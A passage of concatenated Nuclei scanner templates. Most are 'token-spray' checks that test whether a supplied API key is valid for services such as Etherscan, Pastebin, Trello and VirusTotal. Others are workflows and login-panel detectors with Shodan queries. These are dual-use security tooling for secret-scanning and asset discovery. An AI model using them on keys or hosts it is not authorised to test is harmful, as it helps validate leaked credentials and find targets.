26 | -------------------------------------------------------------------------------- /api-dribbble.yaml: -------------------------------------------------------------------------------- 1 | id: api-dribbble 2 | 3 | info: 4 | name: Dribbble API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developer.dribbble.com/v2/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md 10 | tags: token-spray,dribbble 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.dribbble.com/v2/user?access_token={{token}}" 17 | 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /api-ebird.yaml: -------------------------------------------------------------------------------- 1 | id: api-ebird 2 | 3 | info: 4 | name: eBird API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://documenter.getpostman.com/view/664302/S1ENwy59 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/eBird.md 10 | tags: token-spray,ebird 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.ebird.org/v2/data/obs/KZ/recent" 17 | headers: 18 | X-eBirdApiToken: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"speciesCode":' 25 | - '"comName":' 26 | - '"sciName":' 27 | - '"locId":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-etherscan.yaml: -------------------------------------------------------------------------------- 1 | id: api-etherscan 2 | 3 | info: 4 | name: Etherscan API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.etherscan.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md 10 | tags: token-spray,etherscan 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | negative: true 23 | words: 24 | - 'Invalid API Key' 25 | 26 | - type: word 27 | part: body 28 | words: 29 | - '"status":' 30 | - '"message":"OK"' 31 | condition: and 32 | -------------------------------------------------------------------------------- /api-europeana.yaml: -------------------------------------------------------------------------------- 1 | id: api-europeana 2 | 3 | info: 4 | name: Europeana API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://pro.europeana.eu/page/search 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md 10 | tags: token-spray,europeana 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - 'success' 23 | - 'apikey' 24 | - 'action' 25 | condition: and -------------------------------------------------------------------------------- /api-festivo.yaml: -------------------------------------------------------------------------------- 1 | id: api-festivo 2 | 3 | info: 4 | name: Festivo API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md 10 | tags: token-spray,festivo 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.getfestivo.com/v2/holidays?country=US&api_key={{token}}&year=2020" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"id":' 23 | - '"holidays":' 24 | - '"name":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-gofile.yaml: -------------------------------------------------------------------------------- 1 | id: api-gofile 2 | 3 | info: 4 | name: GoFile API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://gofile.io/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/GoFile.md 10 | tags: token-spray,gofile 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.gofile.io/getAccountDetails?token={{token}}&allDetails=true" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"token"' 23 | - '"email"' 24 | - '"rootFolder"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-harvardart.yaml: -------------------------------------------------------------------------------- 1 | id: api-harvardart 2 | 3 | info: 4 | name: Harvard Art Museums API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://github.com/harvardartmuseums/api-docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md 10 | tags: token-spray,harvardart 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"colorid"' 23 | - '"name"' 24 | - '"hex"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-hirak-rates.yaml: -------------------------------------------------------------------------------- 1 | id: api-hirak-rates 2 | 3 | info: 4 | name: Hirak Exchange Rates API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://rates.hirak.site/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Hirak%20Exchange%20Rates.md 10 | tags: token-spray,hirak 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://rates.hirak.site/stat/?token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"token":' 23 | - '"plan":' 24 | - '"hits":' 25 | - '"remain":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-holidayapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-holidayapi 2 | 3 | info: 4 | name: Holiday API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://holidayapi.com/docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Holiday%20API.md 10 | tags: token-spray,holidayapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://holidayapi.com/v1/holidays?pretty&key={{token}}&country=US&year=2020&language=EN" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"holidays":' 23 | - '"name":' 24 | - '"date":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-iconfinder.yaml: -------------------------------------------------------------------------------- 1 | id: api-iconfinder 2 | 3 | info: 4 | name: IconFinder API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developer.iconfinder.com/reference/overview-1 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md 10 | tags: token-spray,iconfinder 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1 17 | Host: api.iconfinder.com 18 | Accept: application/json 19 | Authorization: Bearer {{token}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"icons":' 26 | - '"is_icon_glyph":' 27 | - '"download_url":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-improvmx.yaml: -------------------------------------------------------------------------------- 1 | id: api-improvmx 2 | 3 | info: 4 | name: ImprovMX API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://improvmx.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md 10 | tags: token-spray,improvmx 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.improvmx.com/v3/account HTTP/1.1 17 | Authorization: Basic {{base64(':' + token)}} 18 | Host: api.improvmx.com 19 | 20 | redirects: true 21 | max-redirects: 1 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - '"billing_email":' 27 | - '"cancels_on":' 28 | - '"company_details":' 29 | condition: and 30 | -------------------------------------------------------------------------------- /api-instatus.yaml: -------------------------------------------------------------------------------- 1 | id: api-instatus 2 | 3 | info: 4 | name: Instatus API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://instatus.com/help/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md 10 | tags: token-spray,instatus 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.instatus.com/v1/pages" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":' 25 | - '"subdomain":' 26 | - '"name":' 27 | - '"logoUrl":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-iucn.yaml: -------------------------------------------------------------------------------- 1 | id: api-iucn 2 | 3 | info: 4 | name: IUCN API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - http://apiv3.iucnredlist.org/api/v3/docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/IUCN.md 10 | tags: token-spray,iucn 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "http://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - 'taxonid' 23 | - 'scientific_name' 24 | - 'subspecies' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-mailboxvalidator.yaml: -------------------------------------------------------------------------------- 1 | id: api-mailboxvalidator 2 | 3 | info: 4 | name: MailboxValidator API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.mailboxvalidator.com/api-email-free 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/MailboxValidator.md 10 | tags: token-spray,mailboxvalidator 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.mailboxvalidator.com/v1/email/free?email=test@test.com&key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"email_address":"test@test.com"' 23 | - '"error_code":""' 24 | - '"error_message":""' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-malshare.yaml: -------------------------------------------------------------------------------- 1 | id: api-malshare 2 | 3 | info: 4 | name: MalShare API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://malshare.com/doc.php 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalShare.md 10 | tags: token-spray,malshare 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.malshare.com/api.php?api_key={{token}}&action=getlist" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"md5":' 23 | - '"sha1":' 24 | condition: and 25 | -------------------------------------------------------------------------------- /api-micro-user-service.yaml: -------------------------------------------------------------------------------- 1 | id: api-micro-user-service 2 | 3 | info: 4 | name: Micro User Service API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://m3o.com/user 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md 10 | tags: token-spray,micro-user-service 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://api.m3o.com/v1/user/Read HTTP/1.1 17 | Host: api.m3o.com 18 | Content-Type: application/json 19 | Authorization: Bearer {{token}} 20 | Content-Length: 21 21 | 22 | { 23 | "id": "usrid-1" 24 | } 25 | 26 | matchers: 27 | - type: word 28 | part: body 29 | words: 30 | - '"username":' 31 | - '"email":' 32 | - '"created":' 33 | - '"updated":' 34 | condition: and 35 | -------------------------------------------------------------------------------- /api-mojoauth.yaml: -------------------------------------------------------------------------------- 1 | id: api-mojoauth 2 | 3 | info: 4 | name: MojoAuth API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://mojoauth.com/docs/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/MojoAuth.md 10 | tags: token-spray,mojoauth 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://api.mojoauth.com/token/jwks HTTP/1.1 17 | Host: api.mojoauth.com 18 | X-API-Key: {{token}} 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - '"keys"' 24 | - '"kty"' 25 | - '"kid"' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-myanimelist.yaml: -------------------------------------------------------------------------------- 1 | id: api-myanimelist 2 | 3 | info: 4 | name: MyAnimeList API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://myanimelist.net/apiconfig/references/api/v2 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/MyAnimeList.md 10 | tags: token-spray,myanimelist 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.myanimelist.net/v2/anime?q=one&limit=4" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"data":' 25 | - '"paging":' 26 | - '"next":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-mywot.yaml: -------------------------------------------------------------------------------- 1 | id: api-mywot 2 | 3 | info: 4 | name: My Web of Trust API 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://support.mywot.com/hc/en-us/sections/360004477734-API- 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md 10 | tags: token-spray,weboftrust 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 17 | Host: scorecard.api.mywot.com 18 | x-user-id: {{id}} 19 | x-api-key: {{token}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"target":' 26 | - '"safety":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-nownodes.yaml: -------------------------------------------------------------------------------- 1 | id: api-nownodes 2 | 3 | info: 4 | name: Nownodes API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://nownodes.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Nownodes.md 10 | tags: token-spray,nownodes 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://bsc-blockbook.nownodes.io/api HTTP/1.1 17 | Host: bsc-blockbook.nownodes.io 18 | api-key: {{token}} 19 | Content-Type: application/json 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"coin":' 26 | - '"host":' 27 | - '"version":' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-orbintelligence.yaml: -------------------------------------------------------------------------------- 1 | id: api-orbintelligence 2 | 3 | info: 4 | name: ORB Intelligence API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://api.orb-intelligence.com/docs/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ORB%20Intelligence.md 10 | tags: token-spray,orbintelligence 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.orb-intelligence.com/3/fetch/1/?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"entity_type":' 23 | - '"company_status":' 24 | - '"orb_num":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-pastebin.yaml: -------------------------------------------------------------------------------- 1 | id: api-pastebin 2 | 3 | info: 4 | name: Pastebin API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://pastebin.com/doc_api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md 10 | tags: token-spray,pastebin 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://pastebin.com/api/api_post.php HTTP/1.1 17 | Host: pastebin.com 18 | Content-Type: application/x-www-form-urlencoded 19 | Content-Length: 81 20 | 21 | api_dev_key={{token}}&api_paste_code=test&api_option=paste 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - 'https://pastebin.com/' 28 | -------------------------------------------------------------------------------- /api-petfinder.yaml: -------------------------------------------------------------------------------- 1 | id: api-petfinder 2 | 3 | info: 4 | name: Petfinder API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.petfinder.com/developers/v2/docs/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md 10 | tags: token-spray,petfinder 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 17 | Host: api.petfinder.com 18 | Content-Type: application/x-www-form-urlencoded 19 | Content-Length: 81 20 | 21 | grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - '"token_type"' 28 | - '"expires_in"' 29 | - '"access_token"' 30 | condition: and 31 | -------------------------------------------------------------------------------- /api-pinata.yaml: -------------------------------------------------------------------------------- 1 | id: api-pinata 2 | 3 | info: 4 | name: Pinata API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.pinata.cloud/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pinata.md 10 | tags: token-spray,pinata 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.pinata.cloud/data/pinList?status=pinned HTTP/1.1 17 | Host: api.pinata.cloud 18 | pinata_api_key: {{token}} 19 | pinata_secret_api_key: {{secret}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"id"' 26 | - '"ipfs_pin_hash"' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-quip.yaml: -------------------------------------------------------------------------------- 1 | id: api-quip 2 | 3 | info: 4 | name: Quip API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://quip.com/dev/automation/documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md 10 | tags: token-spray,quip 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://platform.quip.com/1/users/current HTTP/1.1 17 | Host: platform.quip.com 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":' 25 | - '"name":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-rijksmuseum.yaml: -------------------------------------------------------------------------------- 1 | id: api-rijksmuseum 2 | 3 | info: 4 | name: Rijksmuseum API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://data.rijksmuseum.nl/user-generated-content/api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md 10 | tags: token-spray,rijksmuseum 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"count":' 23 | - '"userSets":' 24 | - '"user":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-scanii.yaml: -------------------------------------------------------------------------------- 1 | id: api-scanii 2 | 3 | info: 4 | name: Scanii API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.scanii.com/v2.1/resources.html 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md 10 | tags: token-spray,scanii 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.scanii.com/v2.1/ping HTTP/1.1 17 | Authorization: Basic {{base64(api + ':' + secret)}} 18 | Host: api.scanii.com 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"key"' 25 | - '"message" : "pong"' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-smartsheet.yaml: -------------------------------------------------------------------------------- 1 | id: api-smartsheet 2 | 3 | info: 4 | name: Smartsheet API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://smartsheet.redoc.ly/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Smartsheet.md 10 | tags: token-spray,smartsheet 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.smartsheet.com/2.0/home?include=source" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers-condition: and 21 | matchers: 22 | - type: status 23 | status: 24 | - 200 25 | 26 | - type: word 27 | part: body 28 | words: 29 | - '"sheets":' 30 | - '"folders":' 31 | condition: and 32 | -------------------------------------------------------------------------------- /api-stytch.yaml: -------------------------------------------------------------------------------- 1 | id: api-stytch 2 | 3 | info: 4 | name: Stytch API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://stytch.com/docs/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md 10 | tags: token-spray,stytch 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://test.stytch.com/v1/users HTTP/1.1 17 | Authorization: Basic {{base64(id + ':' + secret)}} 18 | Host: test.stytch.com 19 | Content-Type: application/json 20 | 21 | {"email": "test@stytch.com"} 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - '"status_code":' 28 | - '"request_id":' 29 | - '"user_id":' 30 | condition: and -------------------------------------------------------------------------------- /api-thecatapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-thecatapi 2 | 3 | info: 4 | name: TheCatApi API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.thecatapi.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md 10 | tags: token-spray,thecatapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.thecatapi.com/v1/votes" 17 | headers: 18 | x-api-key: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"country_code":' 25 | - '"created_at":' 26 | condition: and -------------------------------------------------------------------------------- /api-thedogapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-thedogapi 2 | 3 | info: 4 | name: TheDogApi API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.thedogapi.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheDogApi.md 10 | tags: token-spray,thedogapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.thedogapi.com/v1/votes" 17 | headers: 18 | x-api-key: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - 'id":' 25 | - 'image_id":' 26 | - 'sub_id":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-trello.yaml: -------------------------------------------------------------------------------- 1 | id: api-trello 2 | 3 | info: 4 | name: Trello API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.trello.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Trello.md 10 | tags: token-spray,trello 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.trello.com/1/members/me?key={{key}}&token={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | negative: true 22 | words: 23 | - 'invalid key' 24 | -------------------------------------------------------------------------------- /api-urlscan.yaml: -------------------------------------------------------------------------------- 1 | id: api-urlscan 2 | 3 | info: 4 | name: URLScan API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://urlscan.io/docs/api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md 10 | tags: token-spray,urlscan 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://urlscan.io/user/quotas/ HTTP/1.1 17 | Host: urlscan.io 18 | Content-Type: application/json 19 | API-Key: {{token}} 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - 'X-Rate-Limit-Scope:' 26 | - 'X-Rate-Limit-Limit:' 27 | - 'X-Rate-Limit-Remaining:' 28 | condition: and 29 | -------------------------------------------------------------------------------- /api-virustotal.yaml: -------------------------------------------------------------------------------- 1 | id: api-virustotal 2 | 3 | info: 4 | name: VirusTotal API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.virustotal.com/reference 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md 10 | tags: token-spray,virustotal 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 17 | Host: www.virustotal.com 18 | Content-Type: application/x-www-form-urlencoded 19 | Content-Length: 86 20 | 21 | apikey={{token}}&url=google.com 22 | 23 | matchers: 24 | - type: word 25 | part: body 26 | words: 27 | - "'verbose_msg':" 28 | - "'scan_date':" 29 | - "'permalink':" 30 | condition: and 31 | -------------------------------------------------------------------------------- /api-web3storage.yaml: -------------------------------------------------------------------------------- 1 | id: api-web3storage 2 | 3 | info: 4 | name: Web3 Storage API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.web3.storage/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Web3%20Storage.md 10 | tags: token-spray,web3storage 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.web3.storage/user/uploads HTTP/1.1 17 | Host: api.web3.storage 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"created"' 25 | - '"cid"' 26 | condition: and 27 | -------------------------------------------------------------------------------- /apisix-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: apisix-workflow 2 | 3 | info: 4 | name: Apache Apisix Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Apisix related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/apache/apache-apisix-panel.yaml 10 | subtemplates: 11 | - tags: apisix -------------------------------------------------------------------------------- /argocd-login.yaml: -------------------------------------------------------------------------------- 1 | id: argocd-detect 2 | 3 | info: 4 | name: Argo CD Login Panel 5 | author: Adam Crosser,daffainfo 6 | severity: info 7 | description: An Argo CD login panel was discovered. 8 | reference: 9 | - https://argoproj.github.io/cd/ 10 | classification: 11 | cwe-id: CWE-200 12 | metadata: 13 | shodan-query: http.title:"Argo CD" 14 | tags: panel,argocd,login,kubernetes 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/login" 20 | 21 | matchers-condition: and 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - '
([0-9.]+)<\/p>'
40 |
41 | # Enhanced by mp on 2022/03/20
42 |
--------------------------------------------------------------------------------
/avantfax-workflow.yaml:
--------------------------------------------------------------------------------
1 | id: avantfax-workflow
2 |
3 | info:
4 | name: AvantFAX Security Checks
5 | author: daffainfo
6 | description: A simple workflow that runs all AvantFAX Pipeline related nuclei templates on a given target.
7 |
8 | workflows:
9 | - template: exposed-panels/avantfax-panel.yaml
10 | subtemplates:
11 | - tags: avantfax
12 |
--------------------------------------------------------------------------------
/aviatrix-workflow.yaml:
--------------------------------------------------------------------------------
1 | id: aviatrix-workflow
2 |
3 | info:
4 | name: Aviatrix Controller Security Checks
5 | author: daffainfo
6 | description: A simple workflow that runs all Aviatrix Controller related nuclei templates on a given target.
7 |
8 | workflows:
9 | - template: exposed-panels/aviatrix-panel.yaml
10 | subtemplates:
11 | - tags: aviatrix
12 |
--------------------------------------------------------------------------------
/axigen-workflow.yaml:
--------------------------------------------------------------------------------
1 | id: axigen-workflow
2 |
3 | info:
4 | name: Axigen Webmail Security Checks
5 | author: daffainfo
6 | description: A simple workflow that runs all Axigen Webmail related nuclei templates on a given target.
7 |
8 | workflows:
9 | - template: exposed-panels/axigen-webmail.yaml
10 | subtemplates:
11 | - tags: axigen
--------------------------------------------------------------------------------
/b2evolution-workflow.yaml:
--------------------------------------------------------------------------------
1 | id: b2evolution-workflow
2 |
3 | info:
4 | name: b2evolution CMS Security Checks
5 | author: daffainfo
6 | description: A simple workflow that runs all b2evolution CMS related nuclei templates on a given target.
7 |
8 | workflows:
9 | - template: technologies/fingerprinthub-web-fingerprints.yaml
10 | matchers:
11 | - name: b2evolution
12 | subtemplates:
13 | - tags: b2evolution
--------------------------------------------------------------------------------
/bedita-panel.yaml:
--------------------------------------------------------------------------------
1 | id: bedita-panel
2 |
3 | info:
4 | name: BEdita Panel Login
5 | author: pikpikcu,daffainfo
6 | severity: info
7 | metadata:
8 | shodan-query: http.title:"BEdita"
9 | tags: panel,bedita
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}"
15 |
16 | matchers-condition: and
17 | matchers:
18 | - type: regex
19 | part: body
20 | regex:
21 | - 'BEdita(.*)
'
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
27 | extractors:
28 | - type: regex
29 | part: body
30 | group: 1
31 | regex:
32 | - 'target="besite">(.*)
'
33 |
--------------------------------------------------------------------------------
/bitrix-workflow.yaml:
--------------------------------------------------------------------------------
1 | id: bitrix-workflow
2 |
3 | info:
4 | name: Bitrix Security Checks
5 | author: daffainfo
6 | description: A simple workflow that runs all Bitrix related nuclei templates on a given target.
7 |
8 | workflows:
9 | - template: exposed-panels/bitrix-panel.yaml
10 | subtemplates:
11 | - tags: bitrix
12 |
--------------------------------------------------------------------------------
/bookstack-panel.yaml:
--------------------------------------------------------------------------------
1 | id: bookstack-panel
2 |
3 | info:
4 | name: BookStack Panel Login
5 | author: cyllective,daffainfo
6 | severity: info
7 | description: A platform to create documentation/wiki content built with PHP & Laravel
8 | reference:
9 | - https://github.com/BookStackApp/BookStack
10 | metadata:
11 | shodan-query: http.title:"BookStack"
12 | tags: panel,bookstack
13 |
14 | requests:
15 | - method: GET
16 | path:
17 | - "{{BaseURL}}/login"
18 |
19 | matchers-condition: and
